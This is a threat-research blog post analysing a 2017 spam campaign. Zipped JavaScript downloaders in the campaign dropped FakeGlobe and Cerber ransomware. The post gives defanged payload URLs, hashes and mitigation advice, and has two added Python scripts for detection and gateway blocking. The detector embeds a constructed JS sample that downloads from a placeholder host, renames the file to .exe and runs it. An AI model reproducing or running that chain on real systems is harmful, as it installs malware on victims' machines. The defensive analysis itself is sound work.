SpiderLabs Blog

The Spam, JavaScript and Ransomware Triangle

Authors: Dr. Fahim Abbasi and Nicholas Ramos

Introduction

Our global spam honeypot sensors detected a pervasive email campaign that leveraged a zipped attachment containing malicious JavaScript. When opened, the JavaScript infected victims with ransomware. This campaign started in the late hours of 17 July 2017 and, after peaking at over 1.2 million messages, ended on 19 July 2017. A similar burst was observed a few days later, running from 25 July to 27 July 2017, as illustrated by the timeline in Figure 1 and Table 1.

Figure 1: Timeline of the spam campaign showing the spam peaks

Table 1: Spam by country of origin for this campaign.

Analysis of the Email Body

Last May, we reported a spam campaign distributing both FakeGlobe and Cerber ransomware. While that campaign lasted only a few days, we recently observed similar malware being spammed out in a different campaign. This campaign used the same blank subject and body but carried a different attachment: a compressed JavaScript (JS) file. Two different sets of Zip files were used in this campaign, each containing a distinct JavaScript file. Both JS files appeared to use the same code template but contained different URLs pointing to different malware. Anonymized screenshots of the two spam messages with their attachments are shown in Figures 2 and 3. In both messages the Subject field and body were empty. Using a blank subject and body has been a common technique for making signature-based anti-spam detection harder, and it serves as a simple template for spammers.

Figure 2: Sample email message with the zipped attachment

Figure 3: Sample email message with a similar zipped attachment

Analysis of the Attachment

The Malicious JavaScript (JS)

Saving the attachment to disk and unzipping it reveals a JavaScript file. Double-clicking this file may execute it, which is the aim of the spammers. This JavaScript sample is unusual in that it is embedded inside paragraphs of readable text, apparently copied from Wikipedia articles about different countries. We believe the paragraphs were placed at the top of the script to give the appearance of a benign text file, to evade both automated scanners and any human analyst who might preview it in a text editor. Screenshots of one such sample are shown in Figures 4 and 5. In this case, the text passage was copied from a Wikipedia article about China.

Figure 4: Top of the JavaScript file containing a long Wikipedia article about China

Figure 5: JavaScript functions embedded inside the text of the article and at the bottom of it.

There are over 30 obfuscated JS functions crafted by the attackers in this malicious JavaScript sample. These functions perform their malicious activities once they are invoked by a trigger function, as illustrated in Figure 6.

Figure 6: Trigger function that recursively calls all the other malicious JS functions

The trigger function first de-obfuscates URLs and then uses them to download the malicious payload. The script employs a simple de-obfuscation method by removing commas from the obfuscated URLs. As a failsafe method, the attackers have embedded five different URLs in this function to force the victim to download at least one malicious payload, in case any others have been taken offline. A code snippet is illustrated in Figure 7.

Figure 7: URLs hosting the malicious payload are de-obfuscated

These malicious URLs are then supplied to a downloader function. The downloader function uses a Microsoft ActiveX object, namely MSXML2.XMLHTTP. This object is used to send an arbitrary HTTP request, receive the response, and have the Microsoft XML Document Object Model (DOM) parse that response. Here the Open method is used to initialize an MSXML2.XMLHTTP request and specify the HTTP method and URL, as shown in Figure 8. The use of Microsoft ActiveX objects indicates that the spammers are targeting Microsoft Windows victims. The script can be executed simply by double-clicking it on Windows. This is facilitated by the Microsoft Windows Script Host (WSH), a framework for running and automating scripts from the GUI using WScript.exe or from the command line using CScript.exe. WSH supports scripting engines such as JScript and VBScript. Additionally, this script could be interpreted and executed by web browsers, especially Microsoft Internet Explorer and Edge. Other browsers running IE extensions that support ActiveX objects may also be vulnerable.

Figure 8: The downloader function, which initiates the file download over HTTP, along with some inline comments

Next, the attackers leverage the ActiveX stream and filesystem objects to save the downloaded file to the temp folder as a randomly named JPG and then rename it to an EXE, as illustrated in Figures 9, 10 and 11.

Figure 9: Save the malicious payload in the temp folder as a JPG, code shown along with some inline comments

Figure 10: Stream object used to save the downloaded file to disk

Figure 11: Malicious file extension is changed from .JPG to .EXE, code shown along with some inline comments

Finally, the downloaded malware payload is executed using the ActiveX WScript Shell object, as illustrated in Figure 12. In summary, this JavaScript sample is a downloader and executor.

Figure 12: Payload execution via the WScript Shell ActiveX object, code shown along with some inline comments
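As an added illustration (not code from the post or from the sample it analyses), the following Python script applies the static checks a triage analyst would run on such an attachment: it strips the commas from quoted strings to recover the embedded URLs, reversing the trigger function's trick, and looks for the ActiveX ProgIDs that make up the download, write, rename and execute chain. The JS input is constructed to mimic the layout described above; ADODB.Stream and Scripting.FileSystemObject are the standard ProgIDs for the stream and filesystem objects and are assumed here, since the post does not name them.

```python
import re

# Constructed input that mimics the layout described above: filler prose at
# the top, then ActiveX-driven download-and-run logic with comma-split URLs.
# The domain is a placeholder, not one of the campaign's indicators.
SAMPLE_JS = r'''
China, officially the People's Republic of China, is a country in East Asia.
function a1(){ var u = "ht,tp://exa,mple.inv,alid/1.d,oc"; return u.replace(/,/g, ""); }
function a2(){ var x = new ActiveXObject("MSXML2.XMLHTTP"); x.open("GET", a1(), false); x.send(); return x; }
function a3(r){ var s = new ActiveXObject("ADODB.Stream"); s.Open(); s.Type = 1; s.Write(r.responseBody); s.SaveToFile("%TEMP%\\q.jpg", 2); }
function a4(){ var f = new ActiveXObject("Scripting.FileSystemObject"); f.MoveFile("%TEMP%\\q.jpg", "%TEMP%\\q.exe"); }
function a5(){ new ActiveXObject("WScript.Shell").Run("%TEMP%\\q.exe"); }
'''

# ProgIDs forming the download -> write -> rename -> execute chain. MSXML2.XMLHTTP
# and WScript.Shell are named in the analysis; the stream and filesystem ProgIDs
# are the standard ones and are an assumption here.
CHAIN_PROGIDS = {
    "MSXML2.XMLHTTP": "HTTP download",
    "ADODB.Stream": "write response body to disk",
    "Scripting.FileSystemObject": "rename the dropped file",
    "WScript.Shell": "execute the dropped file",
}

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)

def deobfuscate_urls(js_text):
    """Recover URLs split by commas, applying the script's own fix of removing them."""
    found = set()
    for literal in re.findall(r'"([^"]*)"', js_text):
        found.update(URL_RE.findall(literal.replace(",", "")))
    return sorted(found)

def triage(js_text):
    """Return (progids_present, urls, verdict) for a JS attachment."""
    present = [p for p in CHAIN_PROGIDS if p.lower() in js_text.lower()]
    urls = deobfuscate_urls(js_text)
    # The full chain plus a recovered URL is a downloader; any ProgID alone is suspicious.
    if len(present) == len(CHAIN_PROGIDS) and urls:
        verdict = "downloader"
    elif present:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return present, urls, verdict

if __name__ == "__main__":
    progids, urls, verdict = triage(SAMPLE_JS)
    print(verdict, [CHAIN_PROGIDS[p] for p in progids], urls)
```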

Analysis of the Malicious Payload dropped by the JS

We had two different JavaScript samples, built from the same code template but configured with different URLs. This results in downloading two different ransomware families, namely "FakeGlobe" and "Cerber".

Payload – IOC

FakeGlobe Ransomware

This was hosted on the embedded URLs ending with *.dat extension. An example URL extracted from the JS file is listed here:

URL: hxxp://astromfghqmo.com/error.php?f=1.dat

Hash of the Downloaded Files:

  • MD5:D885A811324370FD2CA8ED9075A71652
  • SHA1:DF799BC0225C5391DAE2F0044AAAE745A2C64E14

Encrypted Files and Ransom Note for FakeGlobe:

After execution, the FakeGlobe ransomware sample encrypts and renames files. The encrypted files are renamed with the *.crypt extension, as shown in Figure 13, and a ransom note is dropped as an HTML file, as shown in Figure 14.

Figure 13: Files renamed with *.crypt extension

Figure 14: FakeGlobe ransom note

Cerber Ransomware

The Cerber ransomware was hosted on URLs ending with the *.doc extension. A few URLs extracted from the JS file are listed here:

URLs:

  • hxxp://asopusforums.date/1.doc
  • hxxp://ariadnerevolution.date/1.doc
  • hxxp://asbetosgem.trade/1.doc
  • hxxp://phaennabazaar.trade/1.doc
  • hxxp://dolopolesasz.com/1.doc

Hash of Downloaded Files:

  • MD5: FE1BC60A95B2C2D77CD5D232296A7FA4
  • SHA1: C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684

Encrypted Files and Ransom Note:

After execution, the Cerber ransomware sample encrypts and renames files. Files encrypted by Cerber use random file names and extensions; this sample used random file names with the extension "*.ab22", as shown in Figure 15. Cerber usually drops its ransom note in both "*.hta" and "*.txt" formats, as shown in Figures 16 and 17.

Figure 15: Encrypted files with random names and the *.ab22 extension

Figure 16: Ransom note text file contents

Aside from the files it will also change the wallpaper to display a ransom note, a typical behavior of Cerber.

Figure 17: Ransom note HTML file contents

Conclusion

Attackers are leveraging the simplicity of email to distribute ransomware to victims worldwide. We detected one such campaign in which attackers sent millions of spam messages, picked up by our distributed honeypot sensors. These spam messages had a blank Subject line and an empty message body. The messages fall into two sets, each carrying a different zip attachment that contains a similar obfuscated JavaScript file. The JS files share the same code template but are configured with distinct sets of URLs pointing to different ransomware families. Once executed, the ransomware infects the victim's computer and encrypts its files for ransom. As a mitigation measure, customers should consider blocking JS files at the email gateway, as much of the malware we are seeing recently is distributed via such scripts. Trustwave's Secure Email Gateway effectively detects and blocks this campaign, thus protecting our customers from the threats posed by cyber criminals.
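The gateway control recommended above, as an added example that is not Trustwave's product code: a Python check that opens a zip attachment in memory and blocks delivery if any member carries a Windows Script Host extension. Beyond the .js files seen in this campaign it also covers the other WSH script types (.jse, .vbs, .vbe, .wsf, .wsh), which generalises the post's advice; the sample archives are constructed.

```python
import io
import zipfile

# Extensions handled by the Windows Script Host. The post recommends blocking
# JS; the other WSH types are included here as a generalisation (assumption).
WSH_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}


def script_entries(zip_bytes):
    """Return names of archive members that WSH would execute on double-click."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.lower()
            # Match on the final extension so "invoice.pdf.js" is still caught.
            ext = name[name.rfind("."):] if "." in name else ""
            if ext in WSH_EXTENSIONS:
                hits.append(info.filename)
    return hits


def gateway_decision(zip_bytes):
    """'block' when any member is a WSH script, otherwise 'deliver'."""
    return "block" if script_entries(zip_bytes) else "deliver"


def build_zip(members):
    """Constructed helper: build an in-memory zip from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples mirroring the campaign's zipped-script attachment and a benign one.
MALICIOUS_ZIP = build_zip({"Order_Details.JS": "var x = new ActiveXObject('MSXML2.XMLHTTP');"})
BENIGN_ZIP = build_zip({"report.pdf": "%PDF-1.4 ..."})

if __name__ == "__main__":
    print(gateway_decision(MALICIOUS_ZIP), gateway_decision(BENIGN_ZIP))
```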
